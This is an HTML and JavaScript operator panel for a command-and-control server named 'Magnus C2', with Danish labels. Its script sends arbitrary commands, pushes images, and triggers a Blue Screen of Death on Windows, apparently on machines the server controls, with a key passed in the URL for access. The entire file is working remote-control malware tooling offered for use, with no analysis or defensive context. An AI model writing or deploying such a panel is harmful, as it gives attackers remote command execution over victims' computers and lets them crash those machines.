<!DOCTYPE html>

<style>
    .sendButton {
        width: 150px;
        height: 30px;
        color: black;
        font-family: 'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;
        cursor: pointer;
        font-size: medium;
    }

    .title {
        color: black;
        font-family: 'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;
    }

    .center {
        text-align: center;
    }

    .label {
        font-size: medium;
        font-family: 'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;
        font-weight: bold;
    }
</style>

<html>

    <head>
        <title>Magnus C2</title>
        <meta charset="utf8">
    </head>

    <body>
        <div class="center">
            <h1 class="title">Magnus C2 Server</h1>
            <input type="password" id="key" name="key" placeholder="Key">
            <h3 class="title">Command</h3>
            <input type="text" id="command" name="command" placeholder="Command">
            <br><br>
            <button class="sendButton" style="background-color: blueviolet;" onclick="sendCommand()">Send
                Command!</button>
            <h3 class="title">Vis billede</h3>
            <form enctype="multipart/form-data" id="imageForm">
                <input type="file" id="image" name="image">
                <br><br>
                <input type="submit" class="sendButton" style="background-color: greenyellow;" value="Send Billede!">
            </form>
            <h3 class="title">Blue Screen Of Death (BSOD)</h3>
            <label class="label">Virker kun på windows!</label>
            <br><br>
            <button class="sendButton" style="background-color: blue;" onclick="sendBSOD()">Start BSOD!</button>
        </div>

        <script>
            const form = document.getElementById("imageForm");
            form.onsubmit = function (event) {
                const form = event.currentTarget;
                const formData = new FormData(form);

                key = document.getElementById("key").value;

                fetch(`${document.URL}/post_image?key=${key}`, { "method": "POST", "body": formData })
                    .then(response => {
                        if (response.status == 200) {
                            alert("Billede sendt!");
                        } else if (response.status == 403) {
                            alert("Forkert key!");
                        } else {
                            alert("Ukendt fejl!")
                        }
                    });

                event.preventDefault();
            }

            async function sendBSOD() {
                key = document.getElementById("key").value;

                response = await fetch(`${document.URL}/post_bsod?key=${key}`,
                    {
                        method: "POST", headers: { "Accept": "application/json" }
                    });

                if (response.status == 200) {
                    alert("BSOD Startet!");
                } else if (response.status == 403) {
                    alert("Forkert key!");
                } else {
                    alert("Ukendt fejl!");
                }
            }

            async function sendCommand() {
                key = document.getElementById("key").value;
                command = document.getElementById("command").value;

                response = await fetch(`${document.URL}/post_command?key=${key}&command=${command}`,
                    {
                        method: "POST", headers: { "Accept": "application/json" }
                    });

                if (response.status == 200) {
                    alert("Kommando sendt!");
                } else if (response.status == 403) {
                    alert("Forkert key!");
                } else {
                    alert("Ukendt fejl!");
                }
            }
        </script>
    </body>

</html>